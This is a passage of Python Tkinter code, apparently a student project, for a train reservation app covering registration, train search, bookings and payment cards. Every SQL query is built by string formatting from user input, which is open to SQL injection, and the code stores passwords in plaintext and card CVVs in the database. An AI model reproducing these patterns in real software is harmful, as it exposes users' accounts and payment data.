Button(buttonsFrame, text =\"Add school information (student discount)\", command = self.schoolInfo)\n b6.grid(row = 5, column = 0, columnspan = 2, sticky = EW)\n b7 = Button(buttonsFrame, text =\"Log out\", command = self.logout)\n b7.grid(row = 6, column = 0, columnspan = 2, sticky = EW)\n elif self.custOrManag == \"manager\":\n b8 = Button(buttonsFrame, text =\"View revenue report\", command = self.viewRevenueRep)\n b8.grid(row = 0, column = 0, columnspan = 2, sticky = EW)\n b9 = Button(buttonsFrame, text =\"View popular route report\", command = self.viewpopRR)\n b9.grid(row = 1, column = 0, columnspan = 2, sticky = EW)\n b10=Button(buttonsFrame, text =\"Log out\", command = self.logout)\n b10.grid(row = 2, column = 0, columnspan = 2, sticky = EW)\n\n def switchToRegister(self):\n self.primaryWin.withdraw()\n self.newUserWindow.deiconify()\n self.Register()\n #self.primaryWin.withdraw()\n\n def switchToLogin(self):\n self.newUserWindow.withdraw()\n self.primaryWin.deiconify()\n\n def switchtoMainMenu(self):\n self.primaryWin.withdraw()\n #self.primaryWindow.deiconify()\n self.mainMenu()\n\n def Register(self):\n self.newUserWindow.title(\"New User Registration\")\n frame=Frame(self.newUserWindow)\n frame.pack()\n frame2=Frame(self.newUserWindow)\n frame2.pack(side = BOTTOM)\n\n label1 = Label(frame,text = \"Username\", justify = LEFT)\n label1.grid(row = 0, column = 0, sticky = W)\n self.registeredUser = StringVar()\n self.uentry = Entry(frame, textvariable = self.registeredUser, width = 30, justify = RIGHT)\n self.uentry.grid(row = 0, column = 1, sticky = W)\n\n label2 = Label(frame,text =\"Email Address\", justify = LEFT)\n label2.grid(row = 1, column = 0, sticky = W)\n self.registerEmail = StringVar()\n self.email_entry = Entry(frame, textvariable = self.registerEmail, width = 30, justify = RIGHT)\n self.email_entry.grid(row = 1, column = 1, sticky = W)\n\n label3 = Label(frame,text = \"Password\", justify = LEFT)\n label3.grid(row = 2, column = 0, sticky = W)\n self.registeredPass = StringVar()\n self.password_entry = Entry(frame, textvariable = self.registeredPass, width = 30, justify = RIGHT)\n self.password_entry.grid(row = 2, column = 1, sticky = W)\n\n label4 = Label(frame,text =\"Confirm Password\", justify = LEFT)\n label4.grid(row = 3, column = 0, sticky = W)\n self.registeredPassConfirm = StringVar()\n self.confirm_password_entry = Entry(frame, textvariable = self.registeredPassConfirm, width = 30, justify = RIGHT)\n self.confirm_password_entry.grid(row = 3, column = 1, sticky = W)\n\n b_reg=Button(frame2, text =\"Create\", command = self.registerCredentials)\n b_reg.pack(side = BOTTOM)\n\n def registerCredentials(self):\n if self.registeredUser.get() == \"\" or self.registeredPass.get() == \"\" or self.registeredPassConfirm.get() == \"\" or self.registerEmail.get() == \"\":\n messagebox.showerror(\"Error\", \"Invalid input\")\n return\n\n if self.registeredPass.get() != self.registeredPassConfirm.get():\n messagebox.showerror(\"Error\", \"Passwords must match\")\n return\n\n db = self.Connect()\n cursor = db.cursor()\n query1 = \"SELECT * FROM USER \\\n WHERE USER.Username = '%s'\" % (self.registeredUser.get())\n\n cursor.execute(query1)\n result1 = cursor.fetchall()\n\n\n if len(result1) != 0:\n messagebox.showerror(\"Error\", \"Username already in use\")\n return\n\n querypatch = \"INSERT INTO USER(Username, Password) VALUES ('%s' , '%s')\" % (self.registeredUser.get(), self.registeredPass.get())\n cursor.execute(querypatch)\n result3 = cursor.fetchall()\n\n query2 = \"INSERT INTO CUSTOMER(Username, Email) \\\n VALUES ('%s', '%s')\" % (self.registeredUser.get(), self.registerEmail.get())\n cursor.execute(query2)\n result2 = cursor.fetchall()\n\n cursor.close()\n db.commit()\n db.close()\n self.switchToLogin()\n\n def schoolInfo(self):\n self.primaryWindow.destroy()\n self.schoolInfoWin = Toplevel()\n self.schoolInfoWin.title(\"Add School Info\")\n frame1 = Frame(self.schoolInfoWin)\n frame2 = Frame(self.schoolInfoWin)\n frame1.pack(side = TOP)\n frame2.pack(side = BOTTOM)\n self.emailaddress = StringVar()\n self.entry = Entry(frame1, textvariable = self.emailaddress, width = 30)\n self.entry.grid(row = 0, column = 1)\n label1 = Label(frame1,text = \"School Email Address\")\n label1.grid(row = 0, column = 0)\n label2 = Label(frame1,text = \"Your school email adress ends with .edu\")\n label2.grid(row = 1, column = 0)\n\n b1 = Button(frame2, text =\"Back\", command = self.sMAINMENU)\n b1.grid(row = 2, column = 0)\n b2 = Button(frame2, text =\"Submit\", command = self.writeToDB)\n b2.grid(row = 2, column = 1)\n\n def writeToDB(self):\n server = self.Connect()\n cursor = server.cursor()\n query = \"UPDATE CUSTOMER SET Email = '%s' WHERE Username = '%s'\" % (self.emailaddress.get(),self.username.get())\n cursor.execute(query)\n if self.emailaddress.get()[-4:] == \".edu\":\n query = \"UPDATE CUSTOMER SET Is_student = 1 WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n server.commit()\n cursor.close()\n server.close()\n\n self.schoolInfoWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def logout(self):\n self.primaryWindow.destroy()\n self.primaryWin = Toplevel()\n self.Login()\n\n def sMAINMENU(self):\n self.schoolInfoWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def trainSchedule(self):\n self.primaryWindow.destroy()\n self.trainSchWin = Toplevel()\n self.trainSchWin.title(\"View Train Schedule\")\n frame1 = Frame(self.trainSchWin)\n frame2 = Frame(self.trainSchWin)\n frame1.pack(side = TOP)\n frame2.pack(side = BOTTOM)\n label1 = Label(frame1,text = \"Train Number\")\n label1.pack(side=LEFT)\n\n self.trainNumber = IntVar()\n self.entry = Entry(frame1, textvariable = self.trainNumber, width = 10)\n self.entry.pack(side=RIGHT)\n\n b1 = Button(frame2, text =\"Search\", command = self.schedule)\n b1.pack(side=LEFT)\n\n def getTrainTree(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"arrv\",\"dept\",\"stat\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"arrv\", text= \"Arrival Time\")\n tree.heading(\"dept\", text= \"Departure Time\")\n tree.heading(\"stat\", text= \"Station\")\n return tree\n\n def schedule(self):\n self.trainSchWin.destroy()\n self.scheduleWin = Toplevel()\n self.scheduleWin.title(\"View Train Schedule\")\n\n frame1 = Frame(self.scheduleWin)\n frame1.pack()\n\n tree = self.getTrainTree(frame1)\n server = self.Connect()\n cursor = server.cursor()\n\n trainNum = self.trainNumber.get()\n query1 = \"SELECT * FROM STOP WHERE Train_Number = '%d'\" % (trainNum)\n\n cursor.execute(query1)\n results = cursor.fetchall()\n i = 0\n for result in results:\n tree.insert('', i, text='', values=(result[2], result[0],result[1], result[3]))\n i += 1\n\n b1 = Button(frame1, text =\"Back\", command = self.switchToMainMenu)\n b1.pack(side= BOTTOM)\n\n def switchToMainMenu(self):\n self.scheduleWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def searchTrain(self):\n self.primaryWindow.withdraw()\n self.findAvailWindow = Toplevel()\n\n self.findAvailWindow.title(\"Search Train\")\n frame = Frame(self.findAvailWindow)\n frame.pack(side=TOP)\n frame1=Frame(self.findAvailWindow)\n frame1.pack(side=TOP)\n frame2=Frame(self.findAvailWindow)\n frame2.pack(side=TOP)\n frame3=Frame(self.findAvailWindow)\n frame3.pack(side=TOP)\n\n location= Label(frame,text = \"Departs From\")\n location.grid(row = 0, column = 0, sticky = E)\n self.city = StringVar()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Name FROM STATION\"\n cursor.execute(query)\n results = cursor.fetchall()\n\n option=OptionMenu(frame, self.city, results[0], *results)\n option.grid(row = 0, column = 1, sticky = W)\n\n arriveAt= Label(frame1,text =\"Arrive At\")\n arriveAt.grid(row = 1, column = 0, sticky = E)\n self.arrv = StringVar()\n\n option=OptionMenu(frame1, self.arrv, results[0], *results)\n option.grid(row = 1, column = 1, sticky = W)\n\n depDate= Label(frame2,text =\"Departure Date (YYYY-MM-DD)\")\n depDate.grid(row = 2, column = 0, sticky = E)\n self.date = StringVar()\n\n self.startDateEntry = Entry(frame2, textvariable = self.date, width = 10)\n self.startDateEntry.grid(row = 2, column = 1, sticky = W)\n\n b=Button(frame3, text =\"Find Trains\", command = self.departureInfo)\n b.pack(side=RIGHT)\n\n def selected(self):\n if self.v.get() %2 == 0:\n self.value = (floor(self.v.get()/2)) -1\n else:\n self.value = (floor(self.v.get()/2))\n\n def departureInfo(self):\n start_date = datetime.datetime.strptime(self.startDateEntry.get(), '%Y-%m-%d')\n if start_date < datetime.datetime.now():\n messagebox.showerror(\"Error\", \"Invalid Date (Either in the past or start > end)\")\n else:\n self.findAvailWindow.withdraw()\n self.departureWin = Toplevel()\n self.departureWin.title(\"Select Departure\")\n\n frame = Frame(self.departureWin)\n frame.pack(side=TOP)\n\n chosenCity = self.city.get()[2: len(self.city.get())-3]\n chosenArrv = self.arrv.get()[2: len(self.arrv.get())-3]\n chosenDate = self.date.get()\n\n server = self.Connect()\n cursor = server.cursor()\n\n stop1 = \"CREATE VIEW Stop1 (Train_Number) AS SELECT Train_Number FROM STOP WHERE STOP.Name = '%s'\" % (chosenCity)\n stop2 = \"CREATE VIEW Stop2 (Train_Number) AS SELECT Train_Number FROM STOP WHERE STOP.Name = '%s'\" % (chosenArrv)\n stops = \"CREATE VIEW Stops (Train_Number) AS SELECT Train_Number FROM Stop2 NATURAL JOIN Stop1\"\n query = \"SELECT STOP.Train_Number, STOP.Departure_Time, STOP.Arrival_Time, STOP.Name, TRAIN_ROUTE.First_Class_Price, TRAIN_ROUTE.Second_Class_Price FROM STOP, TRAIN_ROUTE, Stops \\\n WHERE (STOP.Train_Number = Stops.Train_Number) AND (TRAIN_ROUTE.Train_Number = Stops.Train_Number) AND (STOP.Name = '%s' OR STOP.Name = '%s')\" % (chosenCity, chosenArrv)\n\n cursor.execute(query)\n results = cursor.fetchall()\n\n departTime = []\n arriveTime = []\n\n for row in results:\n if str(row[3]) == chosenCity:\n departTime.append((row[1], row[3], row[0], row[4], row[5]))\n if str(row[3]) == chosenArrv:\n arriveTime.append((row[2], row[3], row[0], row[4], row[5]))\n self.duration = []\n for pair1 in departTime:\n for pair2 in arriveTime:\n if pair1[1] == chosenCity and pair2[1] == chosenArrv and pair1[2] == pair2[2]:\n self.duration.append((pair1[2],pair1[0],pair2[0],pair2[0] - pair1[0],pair1[3],pair1[4], pair1[1], pair2[1]))\n # 0: Train_Number, 1: Departure_Time, 2: Arrival_Time, 3: Duration, 4: First_Class_Price, 5: Second_Class_Price, 6: chosenCity, 7: chosenArrv\n\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 0, column = 0)\n l2 = Label(frame,text = \"Time(self.Duration)\").grid(row = 0, column = 2)\n l3 = Label(frame,text = \"1st Class Price\").grid(row = 0, column = 4)\n l4 = Label(frame,text = \"2nd Class Price\").grid(row = 0, column = 6)\n\n a = 1\n b = 1\n c = 2\n self.v = IntVar()\n for result in self.duration:\n Label(frame, text = str(result[0]), anchor = \"w\").grid(row = a, column = 0, sticky = \"ew\")\n Label(frame, text = str(result[1]) + \"-\" + str(result[2]) + \"\\n\" + str(result[3]), anchor = \"w\").grid(row = a, column = 2, sticky = \"ew\")\n Radiobutton(frame, text = str(result[4]), variable = self.v, value = b, command = self.selected).grid(row = a, column = 4, sticky = \"ew\")\n Radiobutton(frame, text = str(result[5]), variable = self.v, value = c, command = self.selected).grid(row = a, column = 6, sticky = \"ew\")\n a += 1\n b += 2\n c += 2\n\n self.row = a\n self.value1 = b\n self.value2 = c\n\n b1=Button(frame, text =\"Back\", command = self.switchtoSearchTrain)\n b1.grid(row = a, column = 0)\n b2=Button(frame, text =\"Next\", command = self.passengerInfo)\n b2.grid(row = a, column = 1)\n\n def switchtoSearchTrain(self):\n self.departureWin.destroy()\n self.findAvailWindow.deiconify()\n\n def passengerInfo(self):\n self.departureWin.withdraw()\n self.passengerInfoWin = Toplevel()\n self.passengerInfoWin.title(\"Travel Extras & Passenger Info\")\n\n frame = Frame(self.passengerInfoWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.passengerInfoWin)\n frame2.pack(side=TOP)\n frame3 = Frame(self.passengerInfoWin)\n frame3.pack(side=TOP)\n frame4 = Frame(self.passengerInfoWin)\n frame4.pack(side=TOP)\n\n baggage= Label(frame,text = \"Number of Baggage\")\n baggage.pack(side=LEFT)\n self.bags = IntVar()\n choices = [\"1\", \"2\", \"3\", \"4\"]\n option=OptionMenu(frame, self.bags, choices[0], *choices)\n option.pack(side=RIGHT)\n disclamer = Label(frame2,text = \"Every passenger can bring upto 4 baggage. 2 free of charge, 2 for $30 per bag\")\n disclamer.pack()\n\n passName= Label(frame3,text =\"Passenger Name\")\n passName.pack(side=LEFT)\n self.name2 = StringVar()\n nameEnt = Entry(frame3, textvariable = self.name2, width = 10)\n nameEnt.pack(side = RIGHT)\n\n if self.v.get() % 2 == 0:\n self.classChosen = 2\n else:\n self.classChosen = 1\n\n b1=Button(frame4, text =\"Back\", command = self.switchToDepartureInfo)\n b1.pack(side=LEFT)\n b2=Button(frame4, text =\"Next\", command=self.updateTrainList)\n b2.pack(side=RIGHT)\n\n def switchToDepartureInfo(self):\n self.passengerInfoWin.destroy()\n self.departureWin.deiconify()\n\n def updateTrainList(self):\n price = 0\n if self.bags.get() < 3:\n bagPrice = 0\n else:\n extraBags = self.bags.get() - 2\n bagPrice = extraBags * 30\n if self.v.get()%2 == 0: #(if even 2nd class)\n self.chosenClass = 2\n price = self.duration[self.value][5]\n else:\n self.chosenClass = 1\n price = self.duration[self.value][4]\n\n self.price = StringVar()\n self.price = price + bagPrice\n self.trainChosen = self.duration[self.value][0]\n self.results1.append((self.trainChosen, self.duration[self.value][1], self.duration[self.value][2], self.duration[self.value][3],\n self.duration[self.value][6],self.duration[self.value][7],\n self.chosenClass, self.price, self.bags.get(), self.name2.get()))\n self.makeReservation()\n\n def makeReservation(self):\n self.passengerInfoWin.withdraw()\n self.reservationWin = Toplevel()\n self.reservationWin.title(\"Make Reservation\")\n\n frame = Frame(self.reservationWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.reservationWin)\n frame2.pack(side=TOP)\n\n selected = Label(frame,text = \"Currently Selected\")\n selected.grid(row = 0, column = 0)\n\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 1, column = 0)\n l2 = Label(frame,text = \"Time(Duration)\").grid(row = 1, column = 1)\n l3 = Label(frame,text = \"Departs From\").grid(row = 1, column = 2)\n l4 = Label(frame,text = \"Arrives At\").grid(row = 1, column = 3)\n l5 = Label(frame,text = \"Class\").grid(row = 1, column = 4)\n l6 = Label(frame,text = \"Price\").grid(row = 1, column =5)\n l7 = Label(frame,text = \"# of baggages\").grid(row = 1, column = 6)\n l8 = Label(frame,text = \"Passenger Name\").grid(row = 1, column = 7)\n l9 = Label(frame,text = \"Remove\").grid(row = 1, column = 8)\n\n\n a = 2\n b = 1\n self.w = IntVar()\n\n for result in self.results1:\n lb1=Label(frame, text = str(result[0]), anchor = \"w\")\n lb1.grid(row = a, column = 0, sticky = \"ew\")\n lb2=Label(frame, text = str(result[1]) + \"-\" + str(result[2]) +\"\\n\" + str(result[3]), anchor = \"w\")\n lb2.grid(row = a, column = 1, sticky = \"ew\")\n lb3=Label(frame, text = str(result[4]), anchor = \"w\")\n lb3.grid(row = a, column = 2, sticky = \"ew\")\n lb4=Label(frame, text = str(result[5]), anchor = \"w\")\n lb4.grid(row = a, column = 3, sticky = \"ew\")\n lb5=Label(frame, text = str(result[6]), anchor = \"w\")\n lb5.grid(row = a, column = 4, sticky = \"ew\")\n lb6=Label(frame, text = str(result[7]), anchor = \"w\")\n lb6.grid(row = a, column = 5, sticky = \"ew\")\n lb7=Label(frame, text = str(result[8]), anchor = \"w\")\n lb7.grid(row = a, column = 6, sticky = \"ew\")\n lb8 = Label(frame, text = str(result[9]), anchor = \"w\")\n lb8.grid(row = a, column = 7, sticky = \"ew\")\n r1 = Radiobutton(frame, text = \"Remove\", variable = self.w, value = b, command = self.select2)\n r1.grid(row = a, column = 8,sticky = \"ew\")\n a = a + 1\n b += 9\n\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT Student_Discount FROM SYSTEM_INFO\"\n cursor.execute(query)\n res = cursor.fetchall()\n discount = res[0][0]\n\n query = \"SELECT Is_student FROM CUSTOMER WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n result3 = cursor.fetchone()\n temp_price = 0\n for entry in self.results1:\n temp_price += entry[7]\n self.price = temp_price\n print(result3[0])\n if result3[0] == 1:\n self.price = self.price*(1-discount/100)\n\n\n stuDis= Label(frame2,text = \"Student Discount Applied.\")\n stuDis.grid(row = 0, column = 0)\n totalC= Label(frame2, text = \"Total Cost\")\n totalC.grid(row = 1, column = 0)\n #cost = StringVar()\n costEnt = Label(frame2, text = self.price, width = 10)\n costEnt.grid(row = 1, column = 1)\n\n useCard= Label(frame2, text = \"Use Card\")\n useCard.grid(row = 4, column = 0)\n\n query = \"SELECT Card_Number FROM PAYMENT_INFO WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n results = cursor.fetchall()\n newRes = []\n for res in results:\n newRes.append(int(res[0]))\n\n self.card = IntVar()\n option=OptionMenu(frame2, self.card, newRes[0], *newRes)\n option.grid(row = 4, column = 1)\n\n b5=Button(frame2, text =\"Delete Card\", command = self.deleteCard)\n b5.grid(row = 4, column =2)\n b1=Button(frame2, text =\"Add Card\", command = self.addCard)\n b1.grid(row = 4, column =3)\n\n b2=Button(frame2, text =\"Continue adding a train\", command = self.switchToSearch)\n b2.grid(row = 5, column = 0)\n\n b3=Button(frame2, text =\"Back\", command = self.switchToPassengerInfo)\n b3.grid(row = 6, column = 0)\n b4=Button(frame2, text =\"Submit\", command = self.confirmation)\n b4.grid(row =6, column = 1)\n\n def switchToSearch(self):\n self.reservationWin.destroy()\n self.searchTrain()\n\n def switchToPassengerInfo(self):\n self.reservationWin. destroy()\n self.passengerInfoWin.deiconify()\n\n## def getCost(self):\n## total = 0\n## for button in self.checkButtonsInDetails:\n## if button.is_checked():\n## total += button.selectRoom()[5]\n## total += button.selectRoom()[2]\n## self.totalCost = total*self.numDays\n## totallabel5 = Label(self.checkDetailsFrame, text=str(self.totalCost))\n## self.totalCostVarLabel.pack(side=TOP)\n## totallabel5.pack(side=TOP)\n\n def addCard(self):\n self.reservationWin.withdraw()\n self.paymentIWin = Toplevel()\n self.paymentIWin.title(\"Add Card\")\n\n frame = Frame(self.paymentIWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.paymentIWin)\n frame2.pack(side=TOP)\n frame3 = Frame(self.paymentIWin)\n frame3.pack(side=TOP)\n frame4 = Frame(self.paymentIWin)\n frame4.pack(side=TOP)\n frame5 = Frame(self.paymentIWin)\n frame5.pack(side=TOP)\n\n l1= Label(frame,text = \"Name on Card\")\n l1.pack(side=LEFT)\n l2= Label(frame2,text = \"Card Number\")\n l2.pack(side=LEFT)\n l3= Label(frame3,text = \"CVV\")\n l3.pack(side=LEFT)\n l4= Label(frame4,text = \"Expiration Date\")\n l4.pack(side=LEFT)\n\n self.name = StringVar()\n cardName = Entry(frame, textvariable = self.name, width = 10)\n cardName.pack(side = RIGHT)\n\n self.num = StringVar()\n cardNum = Entry(frame2, textvariable = self.num, width = 10)\n cardNum.pack(side = RIGHT)\n\n self.CVVnum = StringVar()\n Cvv = Entry(frame3, textvariable = self.CVVnum, width = 10)\n Cvv.pack(side = RIGHT)\n\n self.date1 = StringVar()\n expdate = Entry(frame4, textvariable = self.date1, width = 10)\n expdate.pack(side = RIGHT)\n\n b4=Button(frame5, text =\"Submit\", command = self.addCardCheck)\n b4.pack(side=LEFT)\n\n def addCardCheck(self):\n self.expDate = datetime.datetime.strptime(self.date1.get(), '%Y-%m-%d')\n if self.expDate <= datetime.datetime.now():\n messagebox.showerror(\"Error, your card is expired.\")\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM PAYMENT_INFO \\\n WHERE Card_Number = '%s'\" % (self.num.get())\n cursor.execute(query)\n results = cursor.fetchall()\n if len(results) != 0:\n messagebox.showerror(\"Error\", \"Card number already in use\")\n return\n elif self.expDate == \"\" or self.name.get() == \"\" or self.num.get() == \"\" or self.CVVnum.get() == \"\":\n messagebox.showerror(\"Error\", \"Expiration Date, Name, Number, and CVV must be filled\")\n return\n elif len(self.num.get()) != 10:\n messagebox.showerror(\"Error\", \"Card Number must be 10 digits\")\n return\n elif len(self.CVVnum.get()) != 3:\n messagebox.showerror(\"Error\", \"CVV must be 3 digits\")\n return\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"INSERT INTO PAYMENT_INFO(Card_Number, CVV, Exp_Date, Name_on_card, Username) VALUES ('%s', '%s', '%s', '%s', '%s')\" % (self.num.get(), self.CVVnum.get(), self.expDate, self.name.get(), self.username.get())\n cursor.execute(query)\n result = cursor.fetchall()\n\n server.commit()\n cursor.close()\n server.close()\n self.paymentIWin.destroy()\n self.makeReservation()\n\n def deleteCard(self):\n self.reservationWin.withdraw()\n self.paymentIWin2= Toplevel()\n self.paymentIWin2.title(\"Delete Card\")\n\n frame = Frame(self.paymentIWin2)\n frame.pack(side=TOP)\n frame2 = Frame(self.paymentIWin2)\n frame2.pack(side=BOTTOM)\n cardNum = Label(frame, text = \"Card Number\")\n cardNum.pack(side=LEFT)\n\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT Card_Number FROM PAYMENT_INFO WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query1)\n results = cursor.fetchall()\n\n self.cardNum = StringVar()\n self.cardNum.set(results[0][0])\n\n option=OptionMenu(frame, self.cardNum, results[0], * results)\n option.pack(side=RIGHT)\n\n b1=Button(frame2, text =\"Submit\", command = self.deleteCardCheck)\n b1.pack(side=BOTTOM)\n\n self.cardNum = int(self.cardNum.get()[1:11])\n\n def deleteCardCheck(self):\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT Is_cancelled, Departure_Date FROM RESERVATION NATURAL JOIN RESERVES WHERE Card_Number ='%s'\" % (self.cardNum)\n cursor.execute(query1)\n results = cursor.fetchall()\n for row in results:\n self.departDate = row[1]\n if self.departDate >= datetime.datetime.today() and row[0] == 0:\n messagebox.showerror(\"Error\", \"Card is being used for existing reservation\")\n return\n\n query2 = \"DELETE FROM PAYMENT_INFO WHERE Card_Number = '%s'\" % (self.cardNum)\n cursor.execute(query2)\n\n server.commit()\n cursor.close()\n server.close()\n self.paymentIWin2.destroy()\n self.makeReservation()\n\n def switchToConfirm1(self):\n self.paymentIWin.withdraw()\n self.confirmation()\n\n def switchToConfirm2(self):\n self.paymentIWin2.withdraw()\n self.confirmation()\n\n def backToMain(self):\n self.confirm.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def select2(self):\n self.index = floor(self.w.get()/9)\n self.results1.remove(self.results1[self.index])\n self.reservationWin.destroy()\n self.makeReservation()\n\n def confirmation(self):\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT MAX(ReservationID) FROM RESERVATION\"\n cursor.execute(query)\n maxID = cursor.fetchall()\n self.newReservationID = maxID[0][0] + 1;\n\n query1 = \"INSERT INTO RESERVATION(ReservationID, Is_cancelled, Username, Card_Number) VALUES ('%d', 0, '%s', '%d')\" % (self.newReservationID, self.username.get(),self.card.get())\n cursor.execute(query1)\n\n for res in self.results1:\n query2 = \"INSERT INTO RESERVES(ReservationID, Train_Number, Class, Departure_Date, Passenger_Name, Number_of_Bags, Departs_From, Arrives_At, Total_Cost) \\\n VALUES ('%d', '%d', '%d', '%s', '%s', '%d', '%s', '%s', '%f')\" % (self.newReservationID, self.trainChosen, self.classChosen, self.date.get(), res[9], res[6], res[4], res[5], res[7])\n cursor.execute(query2)\n\n self.reservationWin.destroy()\n self.confirm = Toplevel()\n self.confirm.title(\"Confirmation\")\n\n frame = Frame(self.confirm)\n frame.pack()\n\n label1 = Label(frame, text = \"Reservation ID:\")\n label1.grid(row = 0, column = 0,sticky=E)\n e1 = Label(frame, text = self.newReservationID, width = 10)\n e1.grid(row = 0, column = 1)\n label3 = Label(frame, text=\"Thank you so much for your purchase! Please save the reservation ID for your records.\")\n label3.grid(row = 2, column = 0, columnspan = 2)\n\n query = \"SELECT ReservationID FROM RESERVATION WHERE Card_Number = '%d'\" % (self.card.get())\n cursor.execute(query)\n results = cursor.fetchall()\n\n server.commit()\n cursor.close()\n server.close()\n\n self.entries = []\n self.results1 = []\n\n b=Button(frame, text =\"Go back to choose functionality\", command=self.backToMain)\n b.grid(row=3,column=1,sticky=E)\n\n def updateReservation(self):\n self.primaryWindow.destroy()\n self.updateWin = Toplevel()\n self.updateWin.title(\"Update Reservation\")\n frame = Frame(self.updateWin)\n frame.pack()\n self.resID = IntVar()\n l1 = Label(frame, text = \"Reservation ID\")\n l1.grid(row = 0, column = 0, sticky = E)\n e1 = Entry(frame, textvariable = self.resID, width = 10)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Search\", command = self.updateReservation2)\n b1.grid(row = 0, column = 2, sticky = E)\n b2 = Button(frame, text = \"Back\", command = self.switchMainMenu)\n b2.grid(row = 1, column = 1, sticky = E)\n\n def switchMainMenu(self):\n self.updateWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def update1(self):\n self.index = floor(self.w.get()/9)\n#####################table info, new dept date, change fee, updated cost,#################\n def updateReservation2(self):\n self.updateWin.withdraw()\n self.updateWin2 = Toplevel()\n self.updateWin2.title(\"Update Reservation\")\n\n frame = Frame(self.updateWin2)\n frame.pack()\n frame2 = Frame(self.updateWin2)\n frame2.pack()\n\n l0 = Label(frame,text = \"Select\").grid(row = 1, column = 0)\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 1, column = 1)\n l2 = Label(frame,text = \"Date\").grid(row = 1, column = 2)\n l3 = Label(frame,text = \"Departs From\").grid(row = 1, column = 3)\n l4 = Label(frame,text = \"Arrives At\").grid(row = 1, column = 4)\n l5 = Label(frame,text = \"Class\").grid(row = 1, column = 5)\n l6 = Label(frame,text = \"Price\").grid(row = 1, column =6)\n l7 = Label(frame,text = \"# of baggages\").grid(row = 1, column = 7)\n l8 = Label(frame,text = \"Passenger Name\").grid(row = 1, column = 8)\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.resID.get())\n cursor.execute(query)\n self.results = cursor.fetchall()\n\n a = 2\n b = 1\n self.w = IntVar()\n print(self.results)\n for result in self.results:\n Radiobutton(frame, variable = self.w, value = b, command = self.update1).grid(row = a, column = 0)\n Label(frame, text = str(result[1]), anchor = \"w\").grid(row = a, column = 1, sticky = \"ew\")\n\n l11 = Label(frame, text = str(result[3]), anchor = \"w\")\n l11.grid(row = a, column = 2, sticky = \"ew\")\n l12 = Label(frame, text = str(result[6]), anchor = \"w\")\n l12.grid(row = a, column = 3, sticky = \"ew\")\n l13 = Label(frame, text = str(result[7]), anchor = \"w\")\n l13.grid(row = a, column = 4, sticky = \"ew\")\n l14 = Label(frame, text = str(result[2]), anchor = \"w\")\n l14.grid(row = a, column = 5, sticky = \"ew\")\n l15 =Label(frame, text = str(result[8]), anchor = \"w\")\n l15.grid(row = a, column = 6, sticky = \"ew\")\n l16 = Label(frame, text = str(result[5]), anchor = \"w\")\n l16.grid(row = a, column = 7, sticky = \"ew\")\n l17 = Label(frame, text = str(result[4]), anchor = \"w\")\n l17.grid(row = a, column = 8, sticky = \"ew\")\n a = a + 1\n b += 9\n\n b1 = Button(frame2, text = \"Back\", command = self.switchUpdateReservation)\n b1.pack(side = LEFT)\n b2 = Button(frame2, text = \"Next\", command = self.updateReservation3)\n b2.pack(side = RIGHT)\n\n def switchUpdateReservation(self):\n self.updateWin2.destroy()\n #self.updateWin = Toplevel()\n self.updateReservation()\n\n def switchUpdateReservation2(self):\n self.updateWin3.destroy()\n self.updateReservation2()\n\n def updateTree2(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 2, column = 0)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"date\", \"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"date\", text = \"Date\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def updateTree3(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 4, column = 0, sticky = E)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\", \"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def updateDepartureDate(self):\n self.updatedDate = datetime.datetime.strptime(self.date.get(), '%Y-%m-%d')\n\n\n def updateReservation3(self):\n self.updateWin2.withdraw()\n self.updateWin3 = Toplevel()\n self.updateWin3.title(\"Update Reservation\")\n\n frame = Frame(self.updateWin3)\n frame.pack()\n frame2 = Frame(self.updateWin3)\n frame2.pack()\n frame3 = Frame(self.updateWin3)\n frame3.pack()\n frame4 = Frame(self.updateWin3)\n frame4.pack()\n frame5 = Frame(self.updateWin3)\n frame5.pack()\n\n updateIndex = 